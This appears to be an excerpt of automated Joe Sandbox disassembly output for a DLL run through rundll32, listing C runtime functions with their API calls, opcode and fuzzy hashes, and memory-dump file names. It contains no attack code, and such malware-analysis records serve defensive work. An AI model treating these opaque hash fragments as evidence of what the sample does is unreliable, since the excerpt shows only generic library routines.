          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd
          Similarity
          • API ID: _free$ErrorFreeHeapLast
          • String ID:
          • API String ID: 776569668-0
          • Opcode ID: 9872c4ead130b75454031600e811c5e8895a98bd8b306555f5915ee4750a6115
          • Instruction ID: 462296fb594a2bff6cbd51e16157a33e3a89c43ede96a4a39bf7517d9540ac58
          • Opcode Fuzzy Hash: 9872c4ead130b75454031600e811c5e8895a98bd8b306555f5915ee4750a6115
          • Instruction Fuzzy Hash: 4CF03731400B099BDA60EAF8F0C0D4B73DDAA80A227A02C0AF059D7E44CB25FC908AA4
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true
          • Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd
          Similarity
          • API ID: _free
          • String ID: *?
          • API String ID: 269201875-2564092906
          • Opcode ID: 19c18ddf14ce9615cfa6117e23dcf04fce62630a8d918e35b75d869d6a8ef9cd
          • Instruction ID: 7d52e0fa614137528a374aa087535741751ae81ab37cbca76a9e87990a7c1028
          • Opcode Fuzzy Hash: 19c18ddf14ce9615cfa6117e23dcf04fce62630a8d918e35b75d869d6a8ef9cd
          • Instruction Fuzzy Hash: 5B615A75D042199FDB24CFA8C8819EEFBF9EF48314B1485AED844E7708D771AE418B90
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true
          • Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd
          Similarity
          • API ID: _free
          • String ID: 8On$On
          • API String ID: 269201875-1728545269
          • Opcode ID: 653d049780954781b7876924b50db85095210295a615906349298bc9a89b286d
          • Instruction ID: 592d79f9e44ba0b6b6ade8f33d447ce7cdd152511075a1d1295f39252e6ed41b
          • Opcode Fuzzy Hash: 653d049780954781b7876924b50db85095210295a615906349298bc9a89b286d
          • Instruction Fuzzy Hash: 93117271A15B104FDB605EB8BC40F463698ABC2B35F580B17E522DBBD5E370D9428A85
          APIs
          Memory Dump Source
          • Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true
          • Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd
          Similarity
          • API ID: AdjustPointer
          • String ID:
          • API String ID: 1740715915-0
          • Opcode ID: bf1764df0267fcea1fd74e848e289ad4558e3a9a8956aff4097b0ef68125d83f
          • Instruction ID: c4fbac78414a0be6de6f4144d771729d9ee82d593bc7c127caed2eaf378e09e5
          • Opcode Fuzzy Hash: bf1764df0267fcea1fd74e848e289ad4558e3a9a8956aff4097b0ef68125d83f
          • Instruction Fuzzy Hash: C051E172604646AFEF158FF1D850FAAB3A8EF08316F18496FE95257B90D731E841C790
          APIs
            • Part of subcall function 6E4EC035: _free.LIBCMT ref: 6E4EC043
            • Part of subcall function 6E4ECC09: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000001,6E4ED927,6E4EFBE4,0000FDE9,00000000,?,?,?,6E4EF95D,0000FDE9,00000000,?), ref: 6E4ECCB5
          • GetLastError.KERNEL32 ref: 6E4EBA7B
          • __dosmaperr.LIBCMT ref: 6E4EBA82
          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6E4EBAC1
          • __dosmaperr.LIBCMT ref: 6E4EBAC8
          Memory Dump Source
          • Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true
          • Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd
          Similarity
          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
          • String ID:
          • API String ID: 167067550-0
          • Opcode ID: 1bf9ddeb5c6ac58624fcd7a58db1d9f02c988c65b5a92cb748bc4323411f3267
          • Instruction ID: b3bad4225d4a4b820923b74cd315b945da613a8a21c6f3647136c0b829fab440
          • Opcode Fuzzy Hash: 1bf9ddeb5c6ac58624fcd7a58db1d9f02c988c65b5a92cb748bc4323411f3267
          • Instruction Fuzzy Hash: 2821C471604705AFDF209FF59884D6BB7ACEF4136A710891AF468A7E48E770DC0187E0
          APIs
          • GetLastError.KERNEL32(?,?,?,6E4EF6A4,?,00000001,6E4ED998,?,6E4EFB5E,00000001,?,?,?,6E4ED927,?,00000000), ref: 6E4EB2D1
          • _free.LIBCMT ref: 6E4EB32E
          • _free.LIBCMT ref: 6E4EB364
          • SetLastError.KERNEL32(00000000,00000006,000000FF,?,6E4EFB5E,00000001,?,?,?,6E4ED927,?,00000000,00000000,6E4FCB78,0000002C,6E4ED998), ref: 6E4EB36F
          Memory Dump Source
          • Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true
          • Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd
          Similarity
          • API ID: ErrorLast_free
          • String ID:
          • API String ID: 2283115069-0
          • Opcode ID: 7569476a2ca9f6af9349cf9b073b3d1f2eeea64c3e6e1d8928cedc49e67053ff
          • Instruction ID: f13be2a0f94b3c8578fb1e99a9a5869785044004fc272d115bfe2ee56336badc
          • Opcode Fuzzy Hash: 7569476a2ca9f6af9349cf9b073b3d1f2eeea64c3e6e1d8928cedc49e67053ff
          • Instruction Fuzzy Hash: F51127326047016FD67026F56CC5E6B216EABC2B7FB280D2BF224A3ACDDF618C014194
          APIs
          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6E4F00CA,?,00000001,?,00000001,?,6E4EF633,?,?,00000001), ref: 6E4F067D
          • GetLastError.KERNEL32(?,6E4F00CA,?,00000001,?,00000001,?,6E4EF633,?,?,00000001,?,00000001,?,6E4EFB7F,6E4ED927), ref: 6E4F0689
            • Part of subcall function 6E4F064F: CloseHandle.KERNEL32(FFFFFFFE,6E4F0699,?,6E4F00CA,?,00000001,?,00000001,?,6E4EF633,?,?,00000001,?,00000001), ref: 6E4F065F
          • ___initconout.LIBCMT ref: 6E4F0699
            • Part of subcall function 6E4F0611: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6E4F0640,6E4F00B7,00000001,?,6E4EF633,?,?,00000001,?), ref: 6E4F0624
          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6E4F00CA,?,00000001,?,00000001,?,6E4EF633,?,?,00000001,?), ref: 6E4F06AE
          Memory Dump Source
          • Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true
          • Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd
          Similarity
          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
          • String ID:
          • API String ID: 2744216297-0
          • Opcode ID: 57bbd04981c7b4d3e8de3786125b3f5846ea38d03b3f16dd82d9ae52e5c6ba71
          • Instruction ID: 2f3cb43d0fedce2f5481e17592efb47ad0ec043d181fcc28614a3e0fe25c8bd4
          • Opcode Fuzzy Hash: 57bbd04981c7b4d3e8de3786125b3f5846ea38d03b3f16dd82d9ae52e5c6ba71
          • Instruction Fuzzy Hash: 5FF0F876510528FBCF626FF1EC04D8A3F66EBC9AA1B144451FA1A86120D632C830ABE1
          APIs
          • _free.LIBCMT ref: 6E4EAC58
            • Part of subcall function 6E4EB90F: HeapFree.KERNEL32(00000000,00000000,?,6E4EAB0E), ref: 6E4EB925
            • Part of subcall function 6E4EB90F: GetLastError.KERNEL32(?,?,6E4EAB0E), ref: 6E4EB937
          • _free.LIBCMT ref: 6E4EAC6B
          • _free.LIBCMT ref: 6E4EAC7C
          • _free.LIBCMT ref: 6E4EAC8D
          Memory Dump Source
          • Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true
          • Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd
          Similarity
          • API ID: _free$ErrorFreeHeapLast
          • String ID:
          • API String ID: 776569668-0
          • Opcode ID: 7d269e835c1d3350d2310734a5bb0488d24b857d290f331d26f14dab692f851a
          • Instruction ID: 79561dffd2f669c92bf75050a5046485b2c8d61a5e975ebbbd7b7845968b3d3d
          • Opcode Fuzzy Hash: 7d269e835c1d3350d2310734a5bb0488d24b857d290f331d26f14dab692f851a
          • Instruction Fuzzy Hash: A4E04F71812E259FCE613FB0B4008863B35AFC6E14325051BE40742E19C7310A72DFCE
          Strings
          Memory Dump Source
          • Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true
          • Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd
          Similarity
          • API ID:
          • String ID: C:\Windows\SysWOW64\rundll32.exe
          • API String ID: 0-2837366778
          • Opcode ID: 87b766455858efee915443517d75d9928726719b6e40b22a3ab5522f9aa105cf
          • Instruction ID: fc59ddaac333667a3a0226d240196b87765cfd0be9719247886e218bd4528903
          • Opcode Fuzzy Hash: 87b766455858efee915443517d75d9928726719b6e40b22a3ab5522f9aa105cf
          • Instruction Fuzzy Hash: 2B418C71E00715AFDB22DFFA9884D9EBBFCEF85701B10046BE41597A00E7B08A51DB91
          APIs
          • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6E4E868F
          Strings
          Memory Dump Source
          • Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true
          • Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd
          Similarity
          • API ID: EncodePointer
          • String ID: MOC$RCC
          • API String ID: 2118026453-2084237596
          • Opcode ID: 99f21350c2c1473a08d9c881d713816b6c7fba90362b94180ef86e809992d3e7
          • Instruction ID: 89d8790904d1aae12cae17f418a900ac6b3d5f0582396805c1928d9d270cbcae
          • Opcode Fuzzy Hash: 99f21350c2c1473a08d9c881d713816b6c7fba90362b94180ef86e809992d3e7
          • Instruction Fuzzy Hash: EA418732900209AFCF05CFE4CD81EEEBBB5BF48305F19849AFA18A7651D3359950DB91